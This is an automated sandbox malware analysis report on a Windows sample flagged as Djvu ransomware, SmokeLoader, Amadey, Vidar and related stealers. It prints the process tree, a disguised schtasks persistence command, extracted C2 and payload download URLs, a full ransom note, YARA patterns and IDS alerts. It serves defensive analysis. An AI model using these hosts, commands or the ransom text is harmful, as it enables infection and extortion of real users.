Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
01860199.exe

Overview

General Information

Sample Name:01860199.exe
Analysis ID:876998
MD5:3d8207e1ce6762ff10db118bee3bd99b
SHA1:82a02d6e00de00074b48ba3cc76424a6efe3e6ab
SHA256:c38267836dde53953018c962a372e8e74153f97932418b682fc653ecfcb7bece
Infos:

Detection

Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Amadeys stealer DLL
Detected unpacking (overwrites its own PE header)
Found ransom note / readme
Yara detected Babuk Ransomware
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Clipboard Hijacker
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign processes
Deletes itself after installation
Writes a notice file (html or txt) to demand a ransom
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Sample uses string decryption to hide its real strings
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

  • System is w10x64
  • 01860199.exe (PID: 1264 cmdline: C:\Users\user\Desktop\01860199.exe MD5: 3D8207E1CE6762FF10DB118BEE3BD99B)
    • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • D804.exe (PID: 2560 cmdline: C:\Users\user\AppData\Local\Temp\D804.exe MD5: 6944FCA258A9009F9D3B7212CDB4874D)
        • D804.exe (PID: 772 cmdline: C:\Users\user\AppData\Local\Temp\D804.exe MD5: 6944FCA258A9009F9D3B7212CDB4874D)
          • icacls.exe (PID: 4704 cmdline: icacls "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
          • D804.exe (PID: 128 cmdline: "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask MD5: 6944FCA258A9009F9D3B7212CDB4874D)
            • D804.exe (PID: 4528 cmdline: "C:\Users\user\AppData\Local\Temp\D804.exe" --Admin IsNotAutoStart IsNotTask MD5: 6944FCA258A9009F9D3B7212CDB4874D)
              • build2.exe (PID: 4696 cmdline: "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe" MD5: B888EFE68F257AA2335ED9CBD63C1343)
                • build2.exe (PID: 6096 cmdline: "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe" MD5: B888EFE68F257AA2335ED9CBD63C1343)
              • build3.exe (PID: 5868 cmdline: "C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe" MD5: 9EAD10C08E72AE41921191F8DB39BC16)
                • schtasks.exe (PID: 5268 cmdline: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe" MD5: 15FF7D8324231381BAD48A052F85DF04)
                  • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • C861.exe (PID: 68 cmdline: C:\Users\user\AppData\Local\Temp\C861.exe MD5: 7A8E3D000FBA0F5765B98E2D78EB9D12)
        • WerFault.exe (PID: 5568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 68 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • WerFault.exe (PID: 1868 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 68 -ip 68 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • 3C54.exe (PID: 1720 cmdline: C:\Users\user\AppData\Local\Temp\3C54.exe MD5: 2AF03D52F9CF9E53DFFC1183B403E1B7)
        • aafg31.exe (PID: 2336 cmdline: "C:\Users\user\AppData\Local\Temp\aafg31.exe" MD5: B4F79B3194235084A3EC85711EDFBD38)
        • NewPlayer.exe (PID: 4364 cmdline: "C:\Users\user\AppData\Local\Temp\NewPlayer.exe" MD5: 08240E71429B32855B418A4ACF0E38EC)
          • mnolyk.exe (PID: 5348 cmdline: "C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe" MD5: 08240E71429B32855B418A4ACF0E38EC)
        • XandETC.exe (PID: 5320 cmdline: "C:\Users\user\AppData\Local\Temp\XandETC.exe" MD5: 3006B49F3A30A80BB85074C279ACC7DF)
      • B46F.exe (PID: 4928 cmdline: C:\Users\user\AppData\Local\Temp\B46F.exe MD5: 6944FCA258A9009F9D3B7212CDB4874D)
        • B46F.exe (PID: 2576 cmdline: C:\Users\user\AppData\Local\Temp\B46F.exe MD5: 6944FCA258A9009F9D3B7212CDB4874D)
      • A170.exe (PID: 1868 cmdline: C:\Users\user\AppData\Local\Temp\A170.exe MD5: 15BC205C2CAF7196EE2267087C3B2BB8)
        • A170.exe (PID: 1964 cmdline: C:\Users\user\AppData\Local\Temp\A170.exe MD5: 15BC205C2CAF7196EE2267087C3B2BB8)
      • D804.exe (PID: 1264 cmdline: "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart MD5: 6944FCA258A9009F9D3B7212CDB4874D)
      • 913F.exe (PID: 5260 cmdline: C:\Users\user\AppData\Local\Temp\913F.exe MD5: 15BC205C2CAF7196EE2267087C3B2BB8)
        • 913F.exe (PID: 5512 cmdline: C:\Users\user\AppData\Local\Temp\913F.exe MD5: 15BC205C2CAF7196EE2267087C3B2BB8)
      • F4F7.exe (PID: 5436 cmdline: C:\Users\user\AppData\Local\Temp\F4F7.exe MD5: 7A8E3D000FBA0F5765B98E2D78EB9D12)
      • 5DA0.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\5DA0.exe MD5: 2AF03D52F9CF9E53DFFC1183B403E1B7)
    • D804.exe (PID: 5444 cmdline: "C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe" --AutoStart MD5: 6944FCA258A9009F9D3B7212CDB4874D)
  • hwgujdv (PID: 5940 cmdline: C:\Users\user\AppData\Roaming\hwgujdv MD5: 3D8207E1CE6762FF10DB118BEE3BD99B)
  • D804.exe (PID: 1340 cmdline: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task MD5: 6944FCA258A9009F9D3B7212CDB4874D)
    • D804.exe (PID: 6088 cmdline: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe --Task MD5: 6944FCA258A9009F9D3B7212CDB4874D)
  • mstsca.exe (PID: 6600 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe MD5: 9EAD10C08E72AE41921191F8DB39BC16)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
NameDescriptionAttributionBlogpost URLsLink
FabookieFabookie is facebook account info stealer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.fabookie
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "45.9.74.80/0bjdn2Z/index.php", "Version": "3.67"}
{"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-tnzomMj6HU\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0717JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\\\ni6Rfb9WWM4K\\/vgKVvZi\\/+pA7wR6QvFBURdJ1Z9mdw8kYkafMfVuTEgbW+j4RDepy\\\\nRMc6ZcYdxsu2f4+XgrCWmwJw8wVmodWyLZqqeb1k4FONQs+uAP0AxLLTUbcAfP75\\\\ngGAW9KhqPhoYKVhzDqtFOqCvYqMylrgCNwHpTp75Bv5up3OfAE5h6+t\\/TfjQjDFJ\\\\nJY0Tgum721KiGGppZfsBDqY1Zv\\/F45h+MVk9mhfvBd3UZNJUZI5ewP1zbnOU1llz\\\\ndETA6WbQWWm4u4pamw3U0ZLnFDJQkUgOAbxOfVM4xpi0lrPyV+oTCXnpOgcF4YvU\\\\n2wIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"Version": 2022, "C2 list": ["http://toobussy.com/tmp/", "http://wuc11.com/tmp/", "http://ladogatur.ru/tmp/", "http://kingpirate.ru/tmp/"]}
{"C2 url": ["https://steamcommunity.com/profiles/76561199508624021", "https://t.me/looking_glassbot"], "Botnet": "e44c96dfdf315ccf17cdd4b93cfe6e48"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exeJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exeWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
    • 0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exeWindows_Trojan_Clipbanker_787b130bunknownunknown
    • 0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
    • 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
    • 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
    • 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
    • 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
    C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
      C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
      • 0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
      Click to see the 16 entries
      SourceRuleDescriptionAuthorStrings
      00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x644:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000000.00000002.380036043.0000000000859000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x721c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000007.00000002.460164953.0000000000800000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000016.00000000.460937652.0000000000061000.00000020.00000001.01000000.00000011.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          Click to see the 114 entries
          SourceRuleDescriptionAuthorStrings
          30.0.build3.exe.1000000.0.unpackWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
          • 0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
          30.0.build3.exe.1000000.0.unpackWindows_Trojan_Clipbanker_787b130bunknownunknown
          • 0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 00 01 6A 00 6A 00 FF 15 40 40 00 01 FF 15 2C 40 00 01 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 00 01
          • 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
          • 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A
          • 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ...
          • 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 00 01 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
          32.2.build2.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            20.2.3C54.exe.408ef90.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              22.2.NewPlayer.exe.60000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                Click to see the 128 entries
                No Sigma rule has matched
                Timestamp:192.168.2.38.8.8.857990532045695 05/28/23-10:42:32.589547
                SID:2045695
                Source Port:57990
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3103.100.211.21849720802839238 05/28/23-10:42:49.105133
                SID:2839238
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.38.8.8.853975532045695 05/28/23-10:42:39.331614
                SID:2045695
                Source Port:53975
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:211.59.14.90192.168.2.380497142036335 05/28/23-10:42:46.297030
                SID:2036335
                Source Port:80
                Destination Port:49714
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3123.140.161.24349713802036333 05/28/23-10:42:45.165749
                SID:2036333
                Source Port:49713
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.38.8.8.860767532045695 05/28/23-10:42:51.638861
                SID:2045695
                Source Port:60767
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.38.8.8.859636532045695 05/28/23-10:42:45.594129
                SID:2045695
                Source Port:59636
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:175.119.10.231192.168.2.380497112036335 05/28/23-10:42:45.790332
                SID:2036335
                Source Port:80
                Destination Port:49711
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3175.119.10.23149721802020826 05/28/23-10:42:51.341437
                SID:2020826
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3123.140.161.24349713802020826 05/28/23-10:42:45.165749
                SID:2020826
                Source Port:49713
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3211.59.14.9049714802833438 05/28/23-10:42:45.438118
                SID:2833438
                Source Port:49714
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.38.8.8.856924532045695 05/28/23-10:42:38.041315
                SID:2045695
                Source Port:56924
                Destination Port:53
                Protocol:UDP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3175.119.10.23149721802036333 05/28/23-10:42:51.341437
                SID:2036333
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://zexeq.com/raud/get.phpURL Reputation: Label: malware
                Source: http://45.9.74.80/power.exeURL Reputation: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runURL Reputation: Label: malware
                Source: http://colisumy.com/dl/build2.exeURL Reputation: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=trueQ58Avira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exelAvira URL Cloud: Label: malware
                Source: http://colisumy.com/dl/build2.exe$runAvira URL Cloud: Label: malware
                Source: 45.9.74.80/0bjdn2Z/index.phpAvira URL Cloud: Label: malware
                Source: http://colisumy.com/dl/build2.exerun3Avira URL Cloud: Label: malware
                Source: https://shsplatform.co.uk/tmp/index.phpAvira URL Cloud: Label: malware
                Source: http://45.9.74.80/0bjdn2Z/Plugins/clip64.dllAvira URL Cloud: Label: malware
                Source: http://45.9.74.80/0bjdn2Z/Plugins/cred64.dllAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runZTAvira URL Cloud: Label: malware
                Source: http://jp.imgjeoighw.com/sts/image.jpgOAvira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.phpepAvira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806CAvira URL Cloud: Label: malware
                Source: http://45.9.74.80/0bjdn2Z/index.phpAvira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F011280Nkx%Avira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=trueAvira URL Cloud: Label: malware
                Source: http://colisumy.com/dl/build.exeAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0Avira URL Cloud: Label: malware
                Source: http://toobussy.com/tmp/Avira URL Cloud: Label: malware
                Source: http://45.9.74.80/0bjdn2Z/index.php?scr=1Avira URL Cloud: Label: malware
                Source: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806CgAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exerunb10Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllAvira: detection malicious, Label: HEUR/AGEN.1301090
                Source: C:\Users\user\AppData\Local\Temp\9F31.exeAvira: detection malicious, Label: HEUR/AGEN.1357339
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeAvira: detection malicious, Label: HEUR/AGEN.1357339
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen8
                Source: C:\Users\user\AppData\Local\Temp\6FA9.exeAvira: detection malicious, Label: HEUR/AGEN.1357339
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen8
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeAvira: detection malicious, Label: HEUR/AGEN.1357339
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeAvira: detection malicious, Label: HEUR/AGEN.1319380
                Source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://toobussy.com/tmp/", "http://wuc11.com/tmp/", "http://ladogatur.ru/tmp/", "http://kingpirate.ru/tmp/"]}
                Source: 00000020.00000002.519993720.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199508624021", "https://t.me/looking_glassbot"], "Botnet": "e44c96dfdf315ccf17cdd4b93cfe6e48"}
                Source: 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/raud/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-tnzomMj6HU\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0717JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", 